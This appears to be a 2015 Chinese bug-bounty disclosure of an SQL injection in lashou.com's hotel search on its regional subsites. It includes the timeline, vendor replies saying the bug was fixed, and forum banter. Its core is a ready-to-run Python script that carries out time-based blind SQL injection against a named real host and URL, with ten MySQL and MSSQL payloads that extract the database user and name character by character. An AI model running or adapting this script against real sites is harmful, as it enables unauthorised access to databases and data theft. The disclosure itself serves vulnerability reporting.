2015-01-16: 细节已通知厂商并且等待厂商处理中 2015-01-19: 厂商已经确认,细节仅向厂商公开 2015-01-29: 细节向核心白帽子及相关领域专家公开 2015-02-03: 厂商已经修复漏洞并主动公开,细节向公众公开
拉手网分站存在SQL注入(附验证脚本)
current result is StarCraft@
#!/usr/bin/python# coding=utf-8import httplib,time,string,sys,random,urllibdef getPayloadURL(url,i,payload,payload_type): if payload_type == 1: s = "if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 2: s = "if(ascii(mid(database(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 3: s = "W8ul0scE';if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 4: s = "W8ul0scE';if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 5: s = "aa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 6: s = "aa'XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 7: s = "-1;if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 8: s = "-1;if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 9: s = "-1;if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 10: s = "-1;if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) return url + urllib.quote(s)def exploit(host,url,payload_type,timeout=5): res = '' payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ] for i in range(1,30,1): for payload in payloads: try: conn = httplib.HTTPConnection(host, timeout=timeout) print payload, conn.request(method='GET',url=getPayloadURL(url,i,payload,payload_type),headers={}) sys.stdout.flush() conn.getresponse().read() conn.close() except Exception,e: res += payload print "\ncurrent result is",res break print resif __name__=='__main__': host = 'tangshan.lashou.com' url= '/hotel/search.php?hotelcity=唐山&hotelkw=&line=1003&category=' payload_type = 5 exploit(host,url,payload_type)
http://beijing.lashou.com/也存在同样漏洞
危害等级:中
漏洞Rank:9
确认时间:2015-01-19 11:16
已经通知研发了,正在处理.谢谢.
2015-02-03:漏洞已经修复.谢谢.
乌云现在就缺我这种默默顶贴从来不求脸熟的雷锋
@猪猪侠 这兄弟居然是补天的二哥啊!一月刷几百漏洞的孩子!
@U神 怎么感觉和lijiejie是同学呢
@wcc526 真是来自补天的,大牛好,大牛认识 @lijiejie 吗?
翁迟迟,李姐姐 ,╮(╯▽╰)╭
@猪猪侠 你是机器人么。回复这么快
有爬虫就是吊!人民币玩家,注入杠杠的!
我好像也发现一处但是注入功底太差了!就没去玩了